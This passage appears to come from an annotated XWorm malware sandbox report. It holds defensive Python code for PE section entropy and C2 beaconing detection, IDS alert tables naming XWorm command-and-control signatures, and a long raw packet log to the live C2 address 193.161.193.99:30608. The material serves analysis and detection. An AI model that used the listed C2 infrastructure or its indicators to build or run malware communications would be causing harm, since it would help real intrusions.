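    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        (name, vsize, vaddr, raw_size, raw_ptr,
         _relocs, _lines, _nrelocs, _nlines, chars) = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr, "vsize": vsize, "raw_size": raw_size,
            "characteristics": chars,
            "entropy": shannon_entropy(raw),
        })
    return sections


def likely_packed(sections, threshold=7.0):
    """Executable sections whose entropy sits near the 8.0 ceiling usually hold compressed
    or encrypted payload rather than plain code (the report's .text is at 7.72)."""
    return [s["name"] for s in sections
            if s["characteristics"] & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE)
            and s["entropy"] >= threshold]


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 image (NOT the sample from the report): a .text
    section holding a uniform byte permutation (entropy exactly 8.0) and a low-entropy .rsrc."""
    text_data = bytes((i * 7919) & 0xFF for i in range(512))  # 7919 is odd: every byte value twice
    rsrc_data = b"A" * 480 + b"\0" * 32
    opt_size = 0xE0  # PE32 optional header size
    text_ptr, rsrc_ptr = 0x200, 0x400
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)     # magic only; rest zeroed

    def section(name, vaddr, data, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(data), vaddr, len(data), ptr, 0, 0, 0, 0, chars)

    headers = (dos + coff + opt
               + section(b".text", 0x1000, text_data, text_ptr, 0x60000020)   # CODE|EXECUTE|READ
               + section(b".rsrc", 0x2000, rsrc_data, rsrc_ptr, 0x40000040))  # INITIALIZED_DATA|READ
    image = bytearray(0x600)
    image[:len(headers)] = headers
    image[text_ptr:text_ptr + len(text_data)] = text_data
    image[rsrc_ptr:rsrc_ptr + len(rsrc_data)] = rsrc_data
    return bytes(image)


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s['name']:<8} va=0x{s['vaddr']:x} raw=0x{s['raw_size']:x} entropy={s['entropy']:.3f}")
    print("likely packed:", likely_packed(secs))
```

Entropy is a screening signal, not a verdict: legitimately compressed resources, embedded certificates or media also score high, so the check is only meaningful on sections flagged executable, and a 7.0 cut-off should be paired with the other indicators the report lists (large array initialisations, dynamic method invocation, a single _CorExeMain import).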
                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      07/18/24-16:29:27.355688 | TCP | 2855924 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      07/18/24-16:32:34.193805 | TCP | 2852874 | ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      07/18/24-16:31:23.445768 | TCP | 2853193 | ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      07/18/24-16:33:12.637857 | TCP | 2852923 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      07/18/24-16:33:12.636916 | TCP | 2852870 | ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                      2024-07-18T16:33:12.637857+0200 | TCP | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      2024-07-18T16:31:23.445768+0200 | TCP | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      2024-07-18T16:32:34.193805+0200 | TCP | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      2024-07-18T16:29:27.355688+0200 | TCP | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      2024-07-18T16:33:12.636916+0200 | TCP | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
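The IDS hits above fire on XWorm's PING and check-in bytes, but the C2 session on 192.168.2.6:49717 -> 193.161.193.99:30608 is also visible purely from timing: the client opens a short exchange roughly every 13 to 14 seconds. The following is an added example (not code from the report or from Joe Sandbox) of the periodicity check a detection engineer would run over flow records when no signature exists. The 192.168.2.6 rows are a hand-picked subset of the outbound packets in the report's TCP packet table, truncated to microseconds; the 10.0.0.5 -> 203.0.113.9 flow is made up to show a non-periodic flow that is not flagged. Each exchange's follow-up packets are collapsed into one "contact" before the intervals are measured.

```python
"""Periodicity (beaconing) check over per-flow packet timestamps.
Added example, not part of the Joe Sandbox report; standard library only."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Constructed sample. The 192.168.2.6 -> 193.161.193.99:30608 rows are a hand-picked
# subset of the outbound packets in the report's TCP table (microsecond-truncated);
# the 10.0.0.5 -> 203.0.113.9:443 rows are made up to show a non-periodic flow.
SAMPLE_PACKETS = [
    ("2024-07-18 16:29:13.487385", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:13.493587", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:13.629247", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:27.355688", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:27.567519", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:41.087537", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:41.299422", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:54.820888", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:55.129987", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:08.555394", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:08.777447", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:22.492554", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:22.762067", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:36.602232", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:36.648982", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:50.414748", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:30:50.656250", "192.168.2.6", 49717, "193.161.193.99", 30608),
    ("2024-07-18 16:29:20.000000", "10.0.0.5", 51000, "203.0.113.9", 443),
    ("2024-07-18 16:29:25.000000", "10.0.0.5", 51000, "203.0.113.9", 443),
    ("2024-07-18 16:29:55.000000", "10.0.0.5", 51000, "203.0.113.9", 443),
    ("2024-07-18 16:30:00.000000", "10.0.0.5", 51000, "203.0.113.9", 443),
    ("2024-07-18 16:31:10.000000", "10.0.0.5", 51000, "203.0.113.9", 443),
]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def contact_starts(times, burst_gap=2.0):
    """Collapse packets closer than burst_gap seconds (the ACK/data packets of one
    exchange) into a single 'contact' and return the first timestamp of each."""
    starts, last = [], None
    for t in sorted(times):
        if last is None or (t - last).total_seconds() > burst_gap:
            starts.append(t)
        last = t
    return starts


def beacon_candidates(packets, min_contacts=4, max_cv=0.15, burst_gap=2.0):
    """Return {(src, dst, dport): stats} for flows whose contacts recur at a steady
    interval: at least min_contacts contacts and a coefficient of variation
    (stdev / mean of the gaps between contacts) no larger than max_cv."""
    by_flow = defaultdict(list)
    for ts, src, _sport, dst, dport in packets:
        by_flow[(src, dst, dport)].append(_ts(ts))
    found = {}
    for flow, times in by_flow.items():
        starts = contact_starts(times, burst_gap)
        if len(starts) < min_contacts:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            found[flow] = {"contacts": len(starts), "median_s": median(gaps), "cv": cv}
    return found


if __name__ == "__main__":
    for (src, dst, dport), st in beacon_candidates(SAMPLE_PACKETS).items():
        print(f"{src} -> {dst}:{dport}: {st['contacts']} contacts, "
              f"median {st['median_s']:.2f}s, cv {st['cv']:.3f}")
```

Two caveats when applying this to the full capture rather than the subset. First, the table also shows the server polling the client on its own schedule: 193.161.193.99 sends a packet at 16:29:34.198, 16:30:04.189, 16:30:34.184 and 16:31:04.217, exactly 30 s apart, and the client answers each within 60 ms; a check keyed only to client-initiated contacts would mix those replies into the outbound series and inflate the jitter, so per-direction statistics (or keying on server-initiated contacts as well) are needed. Second, the client cadence drifts from about 13.7 s to 10.4 s later in the capture (16:31:02, 16:31:13, 16:31:23), so a tight max_cv on a long window will miss it where a sliding window would not.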
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Jul 18, 2024 16:29:13.487385988 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:13.492921114 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:13.493587971 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:13.629247904 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:13.635699034 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:27.355688095 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:27.428329945 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:27.554425955 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:27.567519903 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:27.576073885 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:34.198345900 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:34.242753029 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:41.087537050 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:41.092555046 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:41.297314882 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:41.299422979 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:41.304619074 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:54.820888996 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:54.922601938 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:55.127940893 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:29:55.129987955 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:29:55.135632038 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:04.189519882 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:04.242769003 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:08.555394888 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:08.560388088 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:08.775293112 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:08.777447939 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:08.782358885 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:21.336842060 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:21.570595980 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:21.883080006 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:22.492554903 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:22.740978956 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:22.741003990 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:22.741018057 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:22.745438099 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:22.762067080 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:22.765391111 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:22.783134937 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:34.184864044 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:34.226819992 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:34.618174076 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:34.645555973 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:34.982320070 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:34.983603954 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:34.988444090 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:36.602232933 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:36.607105017 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:36.617705107 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:36.622838020 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:36.633368015 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:36.638298988 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:36.648982048 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:36.654597998 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:38.813067913 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:38.817481041 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:38.822309971 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:39.098556995 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:39.101521969 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:39.106756926 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:39.107307911 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:39.112099886 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:41.196535110 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:41.201493025 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:41.417488098 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:41.424334049 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:41.429658890 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:50.414748907 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:50.419939041 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:50.654576063 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:30:50.656250954 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:30:50.661139965 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:02.494404078 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:31:02.500613928 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:02.703906059 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:02.709753036 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:31:02.714626074 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:04.217555046 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:04.258137941 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:31:12.995951891 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:31:13.009941101 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:13.215209007 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:13.216839075 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:31:13.221843004 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:23.367822886 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:31:23.373306990 CEST | 30608 | 49717 | 193.161.193.99 | 192.168.2.6
                      Jul 18, 2024 16:31:23.414602995 CEST | 49717 | 30608 | 192.168.2.6 | 193.161.193.99
                      Jul 18, 2024 16:31:23.420936108 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.445768118 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.450705051 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.477205038 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.482254028 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.508318901 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.513127089 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.539556026 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.544536114 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.555085897 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.560534954 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.572093964 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.573987961 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.621917009 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.621973991 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.626873016 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.633261919 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.638132095 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.688447952 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.690767050 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.695584059 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.839693069 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.843233109 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.850184917 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.853801012 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.858954906 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.939542055 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.941126108 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.946430922 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:23.946566105 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:23.953340054 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:24.046614885 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:24.048177958 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:24.053240061 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:24.053361893 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:24.059273958 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:29.118061066 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:29.123060942 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:29.315830946 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:29.317430973 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:29.323103905 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:30.758411884 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:30.764204979 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:30.963411093 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:30.965291977 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:30.971497059 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.272398949 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.320586920 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.820832014 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.826246023 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.852128983 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.859281063 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.899091005 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.907630920 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.914777994 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.919703007 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:34.992805958 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:34.997751951 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.024141073 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.029128075 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.040916920 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.043380976 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.089745998 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.102139950 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.107712984 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.117832899 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.122678041 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.149064064 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.154210091 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.156157970 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.158185959 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.216897011 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.216965914 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.235677958 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.277107000 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.278616905 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.283677101 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.283736944 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.290210009 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.431416035 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.433367968 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.438570023 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.438625097 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.443837881 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.477174044 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.483577967 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.492719889 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.497642040 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.535203934 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.536787033 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.542251110 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.542298079 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.547162056 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.646959066 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.648490906 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.653728962 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.771608114 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.775208950 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.780330896 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.874428988 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:35.879251003 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:35.884109020 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:40.589730024 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:40.595484972 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:41.070493937 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:41.071825981 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:41.071928978 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:41.072434902 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:41.078141928 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:41.618186951 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:41.624803066 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:42.067006111 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:42.068069935 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:42.068248034 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:42.068526983 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:42.073923111 CEST3060849717193.161.193.99192.168.2.6
                      Jul 18, 2024 16:31:50.836555004 CEST4971730608192.168.2.6193.161.193.99
                      Jul 18, 2024 16:31:50.841979027 CEST3060849717193.161.193.99192.168.2.6
